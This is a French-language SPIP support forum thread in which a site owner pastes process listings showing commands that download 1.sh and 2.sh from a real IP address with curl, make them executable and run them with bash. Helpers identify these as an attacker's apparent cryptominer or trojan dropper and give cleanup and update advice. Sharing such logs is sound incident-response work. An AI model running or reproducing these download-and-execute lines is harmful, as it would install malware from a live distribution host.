504 Gateway Time-out

f3b981650fdcdc75e0a7 · Août 29, 2024, 7:07

D’où peut bien venir ces erreurs ?

« 2236491 zkan8855 20 0 10088 904 680 S 0,0 0,0 0:00.00 sh -c curl -k -o 1.sh http://94.156.69.214/1.sh;chmod 777 1.sh;bash 1.sh
2236509 zkan8855 20 0 10088 1820 1532 S 0,0 0,0 1:05.29 bash 1.sh
2404026 zkan8855 20 0 10088 956 732 S 0,0 0,0 0:00.00 sh -c curl -k -o 2.sh http://94.156.69.214/2.sh;chmod 777 2.sh;bash 2.sh
2404031 zkan8855 20 0 10088 1800 1508 S 0,0 0,0 1:00.02 bash 2.sh
2436065 zkan8855 20 0 10088 908 684 S 0,0 0,0 0:00.00 sh -c curl -k -o 2.sh http://94.156.69.214/2.sh;chmod 777 2.sh;bash 2.sh
2436068 zkan8855 20 0 10088 1812 1528 S 0,0 0,0 0:59.80 bash 2.sh »

Qui me donne une erreur « 504 Gateway Time-out »

Spip 4.3.2 PHP 8.0 site sur o2switch

RealET · Août 29, 2024, 7:12

1.sh, 2.sh : c’est des fichiers déposés par un hackeur ?

Si SPIP n’était pas à jour, probabilité 99% !

RealET · Août 29, 2024, 7:16

C’est exactement ça !
http://94.156.69.214/2.sh contient un script qui installe et fait tourner ce qui est probablement un mineur de bitcoins.

JLuc · Août 29, 2024, 7:31

… la charge active étant « x11 » qui contient au moins un troyen/mineur d’après virustotal.com

f3b981650fdcdc75e0a7 · Août 29, 2024, 8:02

Que faire ?

Merci beaucoup

RealET · Août 29, 2024, 8:04

Mettre à jour SPIP (4.2.16 ou 4.3.2).

Mettre l’écran de sécurité 1.6.3 (mesure d’urgence, mais pas suffisante ; il faut vraiment mettre à jour SPIP).

Nettoyer le site en profondeur pour s’assurer qu’il n’y a pas de fichiers laissés quelque part par le hackeur.

f3b981650fdcdc75e0a7 · Août 29, 2024, 9:52

J’étais pourtant en 4.3.2 et écran de sécurité 1.6.3 !

Jack31 · Août 29, 2024, 11:17

Il est possible que l’entrée ait été faite auparavant sur une version précédente vulnérable… La mise à jour ne touche pas aux autres fichiers que ceux de SPIP. Puis elle a été exploitée ensuite.
Sinon il faut donner des détails et les envoyer à securite@spip.net

RealET · Août 29, 2024, 1:38

Est-ce qu’il y a des fichiers suspects (1.sh, 2.sh, x11) ?

Parce que les logs de ton premier message, c’est peut-être juste des tentatives de les installer.

f3b981650fdcdc75e0a7 · Août 29, 2024, 2:06

Non. Aucun. Et j’ai refait une installation de spip. Le site est planté

JLuc · Août 29, 2024, 2:57

Je les avais récupéré sur le site… donc ils exist(ai)ent bien !

RealET · Août 29, 2024, 3:15

Je ne crois pas que http://94.156.69.214/ soit le site de la victime, mais un site de distribution du payload.

f3b981650fdcdc75e0a7 · Août 29, 2024, 3:33

J’ai retrouvé les fichiers 1.sh, 2.sh et x11 sur un autre de mes sites. Supprimés.

Après installation propre spip 4.3.2, j’ai les messages suivants :

Warning: include_once(ecrire/inc_version.php): Failed to open stream: No such file or directory in /home/…/equipe-centre-lecture.com/spip.php on line 17

Warning: include_once(): Failed opening ‹ ecrire/inc_version.php › for inclusion (include_path=’.:/opt/alt/php80/usr/share/pear:/opt/alt/php80/usr/share/php:/usr/share/pear:/usr/share/php’) in /home/…/equipe-centre-lecture.com/spip.php on line 17

Warning: include(ecrire/public.php): Failed to open stream: No such file or directory in /home/…/equipe-centre-lecture.com/spip.php on line 20

Warning: include(): Failed opening ‹ ecrire/public.php › for inclusion (include_path=’.:/opt/alt/php80/usr/share/pear:/opt/alt/php80/usr/share/php:/usr/share/pear:/usr/share/php’) in /home/…/equipe-centre-lecture.com/spip.php on line 20

RealET · Août 29, 2024, 3:39

On dirait d’après les erreurs qu’il manque le dossier ecrire/ (ou tout au moins, les fichiers qui devraient être dedans)

f3b981650fdcdc75e0a7 · Août 29, 2024, 3:48

Pourtant il est bien là avec les fichiers

RealET · Août 29, 2024, 4:00

Ça peut être une question de droits alors.
Un chmod 755 -r . à la racine du site pourrait aider (755 est à vérifier, ça peut être autre chose selon l’hébergement)